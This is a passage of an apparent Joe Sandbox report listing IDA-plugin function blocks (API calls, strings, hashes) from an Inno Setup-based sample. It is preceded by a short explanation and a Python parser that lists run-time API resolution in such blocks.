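The three function blocks above that pair GetModuleHandleA("user32.dll") with GetProcAddress (resolving ShutdownBlockReasonCreate, ChangeWindowMessageFilter and AllowSetForegroundWindow) are the concrete evidence behind the "Contains functionality to dynamically determine API calls" signature. Two caveats a reviewer of this listing needs: the arguments printed for each call are raw stack slots, not a one-to-one rendering of the function's parameters (the export name for GetProcAddress appears as the second slot of the preceding GetModuleHandleA call, not on the GetProcAddress line itself), and resolving user32 exports that older Windows versions lack is the ordinary way for an installer or GUI runtime to stay backward compatible, so these blocks are weak evidence on their own and are read together with the other signatures. The following Python is an added example and not part of the Joe Sandbox report or of the analysed sample: it parses IDA-plugin function blocks of this shape (APIs, Strings and the String ID token line), and lists which blocks resolve an export at run time. The excerpt it parses is constructed from the listing on this page; the class names and the dynamic_imports heuristic are the example's own and are not a Joe Sandbox feature.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and list run-time API resolution."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt of the listing above: three function blocks, trimmed to the
# line kinds the parser reads (a Memory Dump Source line is kept to show it is skipped).
SAMPLE_REPORT = """\
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: ShutdownBlockReasonCreate$user32.dll
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
Strings
Similarity
• String ID: AllowSetForegroundWindow$user32.dll
APIs
  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
Strings
• Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
• Setting permissions on registry key: %s\\%s, xrefs: 0047362A
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*),\s*xrefs:\s*(?P<ref>[0-9A-F]{8})$")
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                    # stack slots as printed; not one-to-one with parameters
    ref: str                           # address of the call site
    subcall_of: Optional[str] = None   # set for "Part of subcall function X" lines


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[tuple] = field(default_factory=list)   # (text, xref address)
    string_ids: List[str] = field(default_factory=list)  # tokens of the "String ID" line


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing into function blocks; every 'APIs' header starts a new one."""
    blocks: List[FunctionBlock] = []
    section, block = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":
                block = FunctionBlock()
                blocks.append(block)
            continue
        if block is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            block.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            block.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := STRING_ID_RE.match(line)) and m["ids"]:
            block.string_ids = m["ids"].split("$")
    return blocks


def dynamic_imports(blocks: List[FunctionBlock]) -> List[tuple]:
    """(GetProcAddress call site, DLL, export) for every block that resolves an export at run time.
    The export name is taken from the String ID tokens and cross-checked against the
    printed stack slots, because the GetProcAddress line itself does not show lpProcName."""
    found = []
    for b in blocks:
        gpa = next((c for c in b.calls if c.name == "GetProcAddress"), None)
        if gpa is None:
            continue
        dlls = [s for s in b.string_ids if s.lower().endswith(".dll")]
        slots = {a for c in b.calls for a in c.args}
        exports = [s for s in b.string_ids if s not in dlls and s in slots]
        found.extend((gpa.ref, dll, exp) for dll in dlls for exp in exports)
    return found


if __name__ == "__main__":
    for ref, dll, export in dynamic_imports(parse_blocks(SAMPLE_REPORT)):
        print(f"{ref}: GetProcAddress({dll}, \"{export}\")")
```

Run against the full listing, the same parser gives one FunctionBlock per "APIs" header; the subcall_of field keeps the "Part of subcall function" lines (as in the SetLastError line of the registry-permissions block) distinct from the block's own call sites, which matters when counting how many functions actually perform a given call.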
                                                                                        APIs
                                                                                        • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                        • SaveDC.GDI32(?), ref: 00416C83
                                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                        • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                        • String ID:
                                                                                        • API String ID: 3808407030-0
                                                                                        • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                        • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                        • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                        • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                        • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                        • GetDC.USER32(00000000), ref: 0041BC12
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                        • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 1095203571-0
                                                                                        • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                        • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
APIs
  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
Strings
• Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
• Failed to set permissions on registry key (%d)., xrefs: 0047368C
• Setting permissions on registry key: %s\%s, xrefs: 0047362A
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
Similarity
• API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
• String ID: vLB
• API String ID: 1477829881-1797516613
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
• UnregisterClassA.USER32(?,00400000), ref: 004164AB
• RegisterClassA.USER32(?), ref: 004164CE
Strings
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
                                                                                        • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                        • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                        • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1220098344-2970929446
                                                                                        • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                        • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                        • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                        • String ID: LoadTypeLib$RegisterTypeLib
                                                                                        • API String ID: 1312246647-2435364021
                                                                                        • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                        • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                        • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                        • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                        • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                        Strings
                                                                                        • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                        • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                        • API String ID: 3850602802-3720027226
                                                                                        • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                        • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetFocus.USER32 ref: 00478757
                                                                                        • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                        • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FocusMessageStateTextWaitWindow
                                                                                        • String ID: Wnd=$%x
                                                                                        • API String ID: 1381870634-2927251529
                                                                                        • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                        • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                        APIs
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$LocalSystem
                                                                                        • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                        • API String ID: 1748579591-1013271723
                                                                                        • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                        • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesDeleteErrorLastMove
                                                                                        • String ID: DeleteFile$MoveFile
                                                                                        • API String ID: 3024442154-139070271
                                                                                        • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                        • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
